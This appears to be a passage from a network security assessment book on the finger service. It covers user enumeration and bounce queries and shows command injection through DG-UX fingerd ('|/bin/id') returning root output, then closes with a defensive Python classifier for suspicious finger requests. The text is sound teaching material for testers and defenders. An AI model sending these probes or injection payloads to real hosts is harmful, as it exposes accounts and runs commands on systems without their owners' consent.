The fingerd service is commonly found listening on TCP port 79 of Cisco IOS routers. Default out-of-box builds of many commercial Unix-based systems also run the service, including Solaris and BSDI. The service can be queried using a finger client (found in most operating platforms) or by directly using telnet to connect to port 79. Two examples of this follow, in which I show the differences in results from querying a Cisco IOS device and a Solaris server.

Here's a finger query against a Cisco router using telnet:

    # telnet 192.168.0.1 79
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.

        Line     User      Host(s)          Idle      Location
    *  1 vty 0             idle             00:00:00  192.168.0.252
      Se0                  Sync PPP         00:00:00
    Connection closed by foreign host.

Here the finger command queries a Solaris host:

    # finger @192.168.0.10
    [192.168.0.10]
    Login    Name          TTY      Idle  When       Where
    crm      Chris McNab   pts/0    1     Tue 09:08  onyx
    axd      Andrew Done   pts/4    3d    Thu 11:57  goofball

A null query will result in the current users being shown under most fingerd services. From analyzing the format of the response, you can easily differentiate between a Sun Solaris host and a Cisco IOS router.

5.4.1 finger Information Leaks

Various information leak vulnerabilities exist in fingerd implementations. A popular attack involves issuing a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. Example 5-9 highlights a bug present in all Solaris releases up to Version 8; it lets you identify user accounts on the target system.

Example 5-9. Gleaning user details through Solaris fingerd

    # finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
    [192.168.0.10]
    Login     Name                 TTY      Idle  When            Where
    root      Super-User           console        <Jun 3 17:22>   :0
    admin     Super-User           console        <Jun 3 17:22>   :0
    daemon    ???                                 < . . . . >
    bin       ???                                 < . . . . >
    sys       ???                                 < . . . . >
    adm       Admin                               < . . . . >
    lp        Line Printer Admin                  < . . . . >
    uucp      uucp Admin                          < . . . . >
    nuucp     uucp Admin                          < . . . . >
    listen    Network Admin                       < . . . . >
    nobody    Nobody                              < . . . . >
    noaccess  No Access User                      < . . . . >
    nobody4   SunOS 4.x Nobody                    < . . . . >
    informix  Informix User                       < . . . . >
    crm       Chris McNab          pts/0    1     Tue 09:08       onyx
    axd       Andrew Done          pts/4    3d    Thu 11:57       goofball

Many Unix fingerd services perform a simple cross-reference operation of the query string against user information fields in the /etc/passwd file; the following finger command-line options can obtain useful information:

    finger 0@target.host
    finger .@target.host
    finger **@target.host
    finger user@target.host
    finger test@target.host

Performing a finger user@target.host request is especially effective against Linux, BSD, Solaris, and other Unix systems, because it often reveals a number of user accounts, as shown in Example 5-10.

Example 5-10. Gathering user details through standard fingerd services

    # finger user@192.168.189.12
    Login: ftp                              Name: FTP User
    Directory: /home/ftp                    Shell: /bin/sh
    Never logged in.
    No mail.
    No Plan.

    Login: samba                            Name: SAMBA user
    Directory: /home/samba                  Shell: /bin/null
    Never logged in.
    No mail.
    No Plan.

    Login: test                             Name: test user
    Directory: /home/test                   Shell: /bin/sh
    Never logged in.
    No mail.
    No Plan.

5.4.2 finger Redirection

In some cases, servers running fingerd exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and hostnames, you can perform a bounce attack to find internal usernames and host details as follows:

    # finger @192.168.0.10@217.34.17.200
    [217.34.217.200]
    [192.168.0.10]
    Login    Name          TTY      Idle  When       Where
    crm      Chris McNab   pts/0    1     Tue 09:08  onyx
    axd      Andrew Done   pts/4    3d    Thu 11:57  goofball

5.4.3 Directly Exploitable finger Bugs

Poorly written fingerd implementations allow attackers to pipe commands through the service, which are, in turn, run on the target host by the owner of the service process (such as root or bin under Unix-based systems). Example 5-11 shows a vulnerable finger service running on a DG-UX platform being exploited to return the current user ID and network statistics.

Example 5-11. Executing commands through DG-UX fingerd

    # finger "|/bin/id@192.168.0.135"
    [192.168.0.135]
    uid=0(root) gid=0(root)
    # finger "|/bin/ls -a /@192.168.0.135"
    [192.168.0.135]
    total 7690
    drwxr-xr-x  15 root  root     512 Jul 22  2002 .
    drwxr-xr-x  15 root  root     512 Jul 22  2002 ..
    drwxr-xr-x   2 root  bin     1024 Mar  1  2002 bin
    -r-xr-xr-x   1 root  wheel  53248 Feb 19  2002 boot
    drwxr-xr-x   4 root  wheel  15360 Jun 26 09:50 dev
    drwxr-xr-x  18 root  wheel   2560 Oct 12 03:32 etc
    drwxr-xr-x   9 root  wheel    512 Oct 12 03:25 home
    drwxr-xr-x   4 root  wheel    512 Apr 10  2002 mnt
    drwx------  24 root  root    1536 Jun 26 09:41 root
    drwxr-xr-x   2 root  bin     2048 Oct 18  2001 sbin
    drwxr-xr-x   2 root  wheel    512 Oct 18  2001 stand
    lrwxr-xr-x   1 root  wheel     12 Mar 16  2002 sys -> /usr/src/sys
    drwxrwxrwt   4 root  wheel    512 Oct 20 18:05 tmp
    drwxr-xr-x  15 root  wheel    512 Oct 18  2001 usr
    drwxr-xr-x  25 root  wheel    512 May 23  2002 var

Serious buffer overflow vulnerabilities exist in many Linux finger daemons, including cfingerd. At the time of writing, cfingerd 1.4.3 and prior running on Linux (particularly Debian and Red Hat Linux distributions) is especially susceptible to a plethora of remote and locally exploitable bugs. For current details of publicly available finger exploits, you can search Packet Storm for "finger exploit" or the MITRE CVE list at http://cve.mitre.org.
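
Seen from the server side, every query in this section reaches the daemon as a single request line on TCP port 79, because the finger client removes the final @host and connects to it. The Python sketch below is an added example, not part of the original text: it classifies request lines as a logging wrapper or network sensor in front of fingerd might record them. The function names, finding labels and sample requests are constructed for illustration.

```python
import re

# Generic terms the text lists as enumeration probes (0, ., **, user, test).
PROBE_TERMS = {"0", ".", "**", "user", "test"}
SHELL_META = re.compile(r"[|;&`$<>]")

def classify_finger_request(raw):
    """Classify one request line (bytes) as received on TCP port 79."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r").decode("latin-1").strip()
    if line.upper().startswith("/W"):   # RFC 1288 verbose switch
        line = line[2:].strip()
    if not line:
        return ["null-query"]           # lists logged-in users on most daemons
    findings = []
    if SHELL_META.search(line):
        findings.append("shell-metacharacter")  # e.g. a leading pipe
    if "@" in line:
        findings.append("forwarding")           # daemon asked to relay the query
    user_part = line.split("@", 1)[0].strip()
    if len(user_part.split()) > 1:
        findings.append("multi-token-query")    # e.g. '1 2 3 4 5 6 7 8 9 0'
    elif user_part.lower() in PROBE_TERMS:
        findings.append("generic-probe-term")
    return findings or ["single-user-lookup"]

# Constructed sample: (source address, request line) pairs modelled on the
# queries shown in this section. Source addresses are placeholders.
SAMPLE_REQUESTS = [
    ("10.0.0.5", b"\r\n"),
    ("10.0.0.5", b"1 2 3 4 5 6 7 8 9 0\r\n"),
    ("10.0.0.5", b"user\r\n"),
    ("10.0.0.7", b"@192.168.0.10\r\n"),
    ("10.0.0.7", b"|/bin/id\r\n"),
    ("10.0.0.9", b"/W crm\r\n"),
]

def suspicious_sources(requests):
    """Map each source to its findings, ignoring plain single-user lookups."""
    report = {}
    for src, raw in requests:
        hits = [f for f in classify_finger_request(raw) if f != "single-user-lookup"]
        if hits:
            report.setdefault(src, []).extend(hits)
    return report

if __name__ == "__main__":
    for src, hits in suspicious_sources(SAMPLE_REQUESTS).items():
        print(src, hits)
```

A source that produces several different findings in a short window, as the first constructed source does, is a stronger enumeration signal than any single null query.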